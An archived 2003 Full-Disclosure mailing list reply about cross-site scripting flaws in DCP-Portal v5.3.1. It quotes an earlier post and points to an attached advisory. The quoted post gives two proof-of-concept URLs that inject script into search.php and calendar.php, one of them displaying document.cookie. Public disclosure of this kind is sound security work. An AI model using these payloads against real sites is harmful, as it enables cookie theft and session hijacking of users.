[Full-Disclosure] Re: Some XSS vulns

From: mcbethhat_private
Date: Wed Mar 19 2003 - 10:01:25 PST

Next message: Marc Maiffret: "EEYE: XDR Integer Overflow"

Previous message: subj: "WF-Chat"
In reply to: Ertan Kurt: "Some XSS vulns"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, 19 Mar 2003 01:59:35 +0200
Ertan Kurt <ertankat_private> wrote:

> DCP-Portal v5.3.1
> http://target/search.php?fields=content&q=></script>
> http://target/calendar.php?year=>alert(document.cookie);</script>&month=03&day=05
> Vendor Site: http://www.dcp-portal.org

I've found many more vulnerabilities in dcp-portal... look at attached
advisory.


Regards
Grzegorz Aksamit

----------------------------------------------------------
 ( signature censored )
---------------------------------[ grzegorz aksamit ]-----

application/octet-stream attachment: dcp-advisory-06-02-2003.txt

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Marc Maiffret: "EEYE: XDR Integer Overflow"
Previous message: subj: "WF-Chat"
In reply to: Ertan Kurt: "Some XSS vulns"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Mar 19 2003 - 10:27:49 PST